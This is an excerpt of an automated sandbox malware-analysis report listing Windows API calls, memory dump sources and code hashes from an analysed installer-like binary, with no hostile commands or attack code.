                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CursorDesktopWindow$Show
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2074268717-0
                                                                                                                                        • Opcode ID: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                                                                        • Instruction ID: d0219f8535474b9b7e790bb207accfb6dce16a9ac66decbe361331da1304c66b
                                                                                                                                        • Opcode Fuzzy Hash: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                                                                        • Instruction Fuzzy Hash: 91412C75600210AFC710DF2AFA84B56B7E1EB65329B16817BE405CB365DB38DD81CF98
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A75
                                                                                                                                        • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AE4
                                                                                                                                        • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B7F
                                                                                                                                        • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BBE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LoadString$FileMessageModuleName
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 704749118-0
                                                                                                                                        • Opcode ID: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                                                                        • Instruction ID: 7d65b0a5aa49ad722f3f3263bbe29e3330acee4661d9e2153cfe083702b22da2
                                                                                                                                        • Opcode Fuzzy Hash: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                                                                        • Instruction Fuzzy Hash: 1F3123716083849AD370EB65C945BDF77D89B85704F40483FB6C8E72D1EB7859048B6B
                                                                                                                                        APIs
                                                                                                                                        • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E90D
                                                                                                                                          • Part of subcall function 0044CF50: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF82
                                                                                                                                        • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E991
                                                                                                                                          • Part of subcall function 0042BBB4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC8
                                                                                                                                        • IsRectEmpty.USER32(?), ref: 0044E953
                                                                                                                                        • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E976
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 855768636-0
                                                                                                                                        • Opcode ID: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                                                                        • Instruction ID: f7bad605b8f68185b4e834990bb8ca2287257270a928060092b59a923d315d7c
                                                                                                                                        • Opcode Fuzzy Hash: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                                                                        • Instruction Fuzzy Hash: E5114A71B0030067E650BA7B8C86B5B76C9AB88748F15083FB545EB387DE7DDD094299
                                                                                                                                        APIs
                                                                                                                                        • OffsetRect.USER32(?,?,00000000), ref: 00495988
                                                                                                                                        • OffsetRect.USER32(?,00000000,?), ref: 004959A3
                                                                                                                                        • OffsetRect.USER32(?,?,00000000), ref: 004959BD
                                                                                                                                        • OffsetRect.USER32(?,00000000,?), ref: 004959D8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: OffsetRect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 177026234-0
                                                                                                                                        • Opcode ID: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                                                                        • Instruction ID: 9409249b62c1188f54b5b62e2685c04785358b71117f53a2337039625fc08c68
                                                                                                                                        • Opcode Fuzzy Hash: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                                                                        • Instruction Fuzzy Hash: 1121AEB6700701AFDB00DE69CD81E5BB7DAEFC4350F248A2AF944C3249D638ED048761
                                                                                                                                        APIs
                                                                                                                                        • GetCursorPos.USER32 ref: 00417260
                                                                                                                                        • SetCursor.USER32(00000000), ref: 004172A3
                                                                                                                                        • GetLastActivePopup.USER32(?), ref: 004172CD
                                                                                                                                        • GetForegroundWindow.USER32(?), ref: 004172D4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1959210111-0
                                                                                                                                        • Opcode ID: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                                                                        • Instruction ID: de3f0dc6b436800086b9427ec8ddd2ec86eeedce3a35093462374e80c8eda50e
                                                                                                                                        • Opcode Fuzzy Hash: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                                                                        • Instruction Fuzzy Hash: C52183313086118AD720AFA9E945AE733F1EF44754B0544ABF8558B352DB3DDC82CB9E
                                                                                                                                        APIs
                                                                                                                                        • MulDiv.KERNEL32(?,00000008,?), ref: 004955F1
                                                                                                                                        • MulDiv.KERNEL32(?,00000008,?), ref: 00495605
                                                                                                                                        • MulDiv.KERNEL32(?,00000008,?), ref: 00495619
                                                                                                                                        • MulDiv.KERNEL32(?,00000008,?), ref: 00495637
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                                                                        • Instruction ID: b77f8f3c6746ea581d036ce488ab013aedd37a602364075716cddbfd1b85439e
                                                                                                                                        • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                                                                        • Instruction Fuzzy Hash: A5112E72604504ABCB40DEA9D8C4D9B7BECEF8D324B6441AAF908DB242D674ED408B68
                                                                                                                                        APIs
                                                                                                                                        • GetClassInfoA.USER32(00400000,0041F470,?), ref: 0041F4A1
                                                                                                                                        • UnregisterClassA.USER32(0041F470,00400000), ref: 0041F4CA
                                                                                                                                        • RegisterClassA.USER32(00499598), ref: 0041F4D4
                                                                                                                                        • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F50F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4025006896-0
                                                                                                                                        • Opcode ID: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
                                                                                                                                        • Instruction ID: 7a0dc659497f48f9aad4428a0df7724adcaf244520b53866b591a9b3b5545ee4
                                                                                                                                        • Opcode Fuzzy Hash: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
                                                                                                                                        • Instruction Fuzzy Hash: F6011B72240104AADA10EBACED81E9B33999729314B11423BB615E72A2D6399C558BAC
                                                                                                                                        APIs
                                                                                                                                        • WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                                                                        • CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4071923889-0
                                                                                                                                        • Opcode ID: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                                                                                                        • Instruction ID: ea90b2abd28d60bbe0c33bbe6d7a83e36ef454db8471bda6b5c19e9a906557d9
                                                                                                                                        • Opcode Fuzzy Hash: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                                                                                                        • Instruction Fuzzy Hash: B9012D31A006097FEB1097AA8C02F6FBBECDF49764F610127F904D72C2C5788D409A78
                                                                                                                                        APIs
                                                                                                                                        • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D027
                                                                                                                                        • LoadResource.KERNEL32(00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58,0000000A,00000000), ref: 0040D041
                                                                                                                                        • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58), ref: 0040D05B
                                                                                                                                        • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?), ref: 0040D065
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Resource$FindLoadLockSizeof
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3473537107-0
                                                                                                                                        • Opcode ID: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                                                                        • Instruction ID: ce77ce8360aa458f47a01e9b0563465317cd85cc21d7bcd45488e041df035c61
                                                                                                                                        • Opcode Fuzzy Hash: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                                                                        • Instruction Fuzzy Hash: 49F04F726056046F9B14EE59A881D5B77ECDE88268310013AF908E7286DA38DD018B68
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,0049B450,?,?,?,004018B4), ref: 00401566
                                                                                                                                        • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,0049B450,?,?,?,004018B4), ref: 0040158B
                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,0049B450,?,?,?,004018B4), ref: 004015B1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Virtual$Alloc$Free
                                                                                                                                        • String ID: uu
                                                                                                                                        • API String ID: 3668210933-2249551878
                                                                                                                                        • Opcode ID: 4da9ee4765cce6e6c7be3d7cc9adf05dad1d6bab5239e3db9b33b19d934b365d
                                                                                                                                        • Instruction ID: ed10fda1d5a177d2a0c43996bc0be7fa2989f050302610c9045c0a13ae1d279a
                                                                                                                                        • Opcode Fuzzy Hash: 4da9ee4765cce6e6c7be3d7cc9adf05dad1d6bab5239e3db9b33b19d934b365d
                                                                                                                                        • Instruction Fuzzy Hash: AFF0C8716403206AEB315A294C85F133AD4DBC5754F104075BE09FF3DAD6B8980082AC
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(?,00000000), ref: 004705F1
                                                                                                                                        Strings
                                                                                                                                        • Failed to set NTFS compression state (%d)., xrefs: 00470602
                                                                                                                                        • Setting NTFS compression on file: %s, xrefs: 004705BF
                                                                                                                                        • Unsetting NTFS compression on file: %s, xrefs: 004705D7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast
                                                                                                                                        • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                                                                        • API String ID: 1452528299-3038984924
                                                                                                                                        • Opcode ID: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                                                                        • Instruction ID: 452327faed6fd823952186a677ff1a78a18aba12ee86070aec797b5412e08bdc
                                                                                                                                        • Opcode Fuzzy Hash: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                                                                        • Instruction Fuzzy Hash: A5018B71D09248A6CB04D7AD94512DDBBE49F4D314F44C5FFE459D7342DB780A088B9E
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000), ref: 0046FE45
                                                                                                                                        Strings
                                                                                                                                        • Unsetting NTFS compression on directory: %s, xrefs: 0046FE2B
                                                                                                                                        • Setting NTFS compression on directory: %s, xrefs: 0046FE13
                                                                                                                                        • Failed to set NTFS compression state (%d)., xrefs: 0046FE56
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast
                                                                                                                                        • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                                                                        • API String ID: 1452528299-1392080489
                                                                                                                                        • Opcode ID: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                                                                        • Instruction ID: 6c3eba688a3488f6cff2036d9eec8e6f632fba0cce39d579df3f4bd3b957a0ce
                                                                                                                                        • Opcode Fuzzy Hash: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                                                                        • Instruction Fuzzy Hash: E5014421E0824856CB04D7ADE44129DBBA49F49304F4485BBA495E7253EB790A09879B
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                        • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000,0045B7D5), ref: 00455DD8
                                                                                                                                        • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000), ref: 00455DE1
                                                                                                                                        • RemoveFontResourceA.GDI32(00000000), ref: 00455DEE
                                                                                                                                        • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455E02
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4283692357-0
                                                                                                                                        • Opcode ID: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                                                                        • Instruction ID: 71ccc6c4ad223293e5fa71c014565a1ca4f3f808124b73c5b0663eb55104ffd2
                                                                                                                                        • Opcode Fuzzy Hash: 53be27aa0997865f395f34354d63af882f7726c3d4a8d794711f16c86898bbe7
                                                                                                                                        • Instruction Fuzzy Hash: 57F0BEB174070036EA10B6BAAC4BF2B26CC8F54745F10883ABA00EF2C3D97CDC04962D
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$CountSleepTick
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2227064392-0
                                                                                                                                        • Opcode ID: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                                                                        • Instruction ID: 56d8cd0ebf6ab4a4d31aad6ab38b951dee0ff9c0bbbb70c30f4e079d31b44593
                                                                                                                                        • Opcode Fuzzy Hash: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                                                                        • Instruction Fuzzy Hash: C6E0ED6A30921149863131AE98CA6AF4D48CBC2324B28853FE08CE6283C89C4C0A867E
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB,00000000), ref: 0047820D
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB), ref: 00478213
                                                                                                                                        • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478235
                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478246
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 215268677-0
                                                                                                                                        • Opcode ID: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                                                                        • Instruction ID: 91f0679cb69370e855683a510bc75a037ced8834772831ea40795c83ba0b1c60
                                                                                                                                        • Opcode Fuzzy Hash: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
